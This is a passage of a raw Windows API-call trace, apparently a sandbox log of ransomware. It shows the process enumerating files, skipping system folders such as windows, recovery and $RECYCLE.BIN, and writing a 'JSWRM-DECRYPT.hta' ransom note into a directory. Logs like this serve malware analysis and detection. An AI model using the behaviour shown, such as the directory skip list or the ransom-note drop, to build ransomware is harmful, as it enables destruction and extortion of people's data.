(lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="$RECYCLE.BIN") returned 1 [0058.166] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="system volume information") returned -1 [0058.166] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="msocache") returned -1 [0058.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0058.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="downlevel_2017_09_07_02_02_39_766.log", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0058.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="downlevel_2017_09_07_02_02_39_766.log", cchWideChar=37, lpMultiByteStr=0x22d490, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="downlevel_2017_09_07_02_02_39_766.log", lpUsedDefaultChar=0x0) returned 37 [0058.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0058.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0058.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="downlevel_2017_09_07_02_02_39_766.log", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0058.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="downlevel_2017_09_07_02_02_39_766.log", cchWideChar=37, lpMultiByteStr=0x22d458, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="downlevel_2017_09_07_02_02_39_766.log", lpUsedDefaultChar=0x0) returned 37 [0058.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0058.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0058.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.166] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19539cb2, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x19539cb2, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x19539cb2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22d286, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0058.166] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0058.166] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0058.166] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0058.166] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0058.166] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0058.166] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0058.166] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0058.166] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0058.166] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0058.166] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0058.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0058.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0058.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0058.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0058.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0058.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0058.275] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x60002, dwReserved1=0x22d286, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="OOBE_2~1.LOG")) returned 1 [0058.275] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2=".") returned 1 [0058.275] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="..") returned 1 [0058.275] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="...") returned 1 [0058.275] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="windows") returned -1 [0058.275] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="recovery") returned -1 [0058.275] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="perflogs") returned -1 [0058.275] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="documents and settings") returned 1 [0058.275] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="$RECYCLE.BIN") returned 1 [0058.275] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="system volume information") returned -1 [0058.275] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="msocache") returned 1 [0058.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0058.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oobe_2017_09_07_03_08_57_737.log", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0058.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oobe_2017_09_07_03_08_57_737.log", cchWideChar=32, lpMultiByteStr=0x22d458, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oobe_2017_09_07_03_08_57_737.log", lpUsedDefaultChar=0x0) returned 32 [0058.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0058.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0058.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oobe_2017_09_07_03_08_57_737.log", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0058.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oobe_2017_09_07_03_08_57_737.log", cchWideChar=32, lpMultiByteStr=0x22d490, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oobe_2017_09_07_03_08_57_737.log", lpUsedDefaultChar=0x0) returned 32 [0058.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0058.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0058.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0058.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.276] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x60002, dwReserved1=0x22d286, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 1 [0058.276] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2=".") returned 1 [0058.276] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="..") returned 1 [0058.276] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="...") returned 1 [0058.276] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="windows") returned -1 [0058.276] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="recovery") returned -1 [0058.276] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="perflogs") returned -1 [0058.276] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="documents and settings") returned 1 [0058.276] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="$RECYCLE.BIN") returned 1 [0058.276] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="system volume information") returned -1 [0058.276] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="msocache") returned 1 [0058.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PartnerSetupCompleteResult.log", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0058.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0058.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PartnerSetupCompleteResult.log", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PartnerSetupCompleteResult.log", lpUsedDefaultChar=0x0) returned 30 [0058.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PartnerSetupCompleteResult.log", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0058.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0058.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PartnerSetupCompleteResult.log", cchWideChar=30, lpMultiByteStr=0x2411c8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PartnerSetupCompleteResult.log", lpUsedDefaultChar=0x0) returned 30 [0058.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x1ee520 [0058.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0058.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0058.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0058.277] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x60002, dwReserved1=0x22d286, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 0 [0058.277] FindClose (in: hFindFile=0x231cc0 | out: hFindFile=0x231cc0) returned 1 [0058.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ee520 | out: hHeap=0x1e0000) returned 1 [0058.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0058.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0058.277] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1f6726, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0058.277] lstrcmpiW (lpString1="SafeOS", lpString2=".") returned 1 [0058.277] lstrcmpiW (lpString1="SafeOS", lpString2="..") returned 1 [0058.277] lstrcmpiW (lpString1="SafeOS", lpString2="...") returned 1 [0058.277] lstrcmpiW (lpString1="SafeOS", lpString2="windows") returned -1 [0058.277] lstrcmpiW (lpString1="SafeOS", lpString2="recovery") returned 1 [0058.277] lstrcmpiW (lpString1="SafeOS", lpString2="perflogs") returned 1 [0058.277] lstrcmpiW (lpString1="SafeOS", lpString2="documents and settings") returned 1 [0058.277] lstrcmpiW (lpString1="SafeOS", lpString2="$RECYCLE.BIN") returned 1 [0058.277] lstrcmpiW (lpString1="SafeOS", lpString2="system volume information") returned -1 [0058.278] lstrcmpiW (lpString1="SafeOS", lpString2="msocache") returned 1 [0058.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0058.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0058.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0058.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x233160 [0058.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.278] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\JSWRM-DECRYPT.hta" (normalized: "c:\\$getcurrent\\safeos\\jswrm-decrypt.hta")) returned 0xffffffff [0058.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0058.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0058.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23bc78 [0058.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0058.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x23da48 [0058.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23bc78 | out: hHeap=0x1e0000) returned 1 [0058.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x232db8 [0058.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.281] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\JSWRM-DECRYPT.hta" (normalized: "c:\\$getcurrent\\safeos\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0058.282] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.282] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0058.283] CloseHandle (hObject=0x450) returned 1 [0058.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0058.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da48 | out: hHeap=0x1e0000) returned 1 [0058.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0058.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0058.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0058.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x232e88 [0058.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.283] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\JSWRM-DECRYPT.hta" (normalized: "c:\\$getcurrent\\safeos\\jswrm-decrypt.hta")) returned 0x20 [0058.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0058.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.283] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x1966ae7d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22d286, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0058.283] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.283] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x1966ae7d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22d286, cFileName="..", cAlternateFileName="")) returned 1 [0058.283] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.284] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.284] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x60002, dwReserved1=0x22d286, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0058.284] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2=".") returned 1 [0058.284] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="..") returned 1 [0058.284] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="...") returned 1 [0058.284] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="windows") returned -1 [0058.284] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="recovery") returned -1 [0058.284] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="perflogs") returned -1 [0058.284] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="documents and settings") returned 1 [0058.284] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="$RECYCLE.BIN") returned 1 [0058.284] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="system volume information") returned -1 [0058.284] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="msocache") returned -1 [0058.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GetCurrentOOBE.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0058.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0058.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GetCurrentOOBE.dll", cchWideChar=18, lpMultiByteStr=0x241178, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentOOBE.dll", lpUsedDefaultChar=0x0) returned 18 [0058.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GetCurrentOOBE.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0058.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0058.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GetCurrentOOBE.dll", cchWideChar=18, lpMultiByteStr=0x241358, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentOOBE.dll", lpUsedDefaultChar=0x0) returned 18 [0058.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0058.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0058.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0058.284] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, 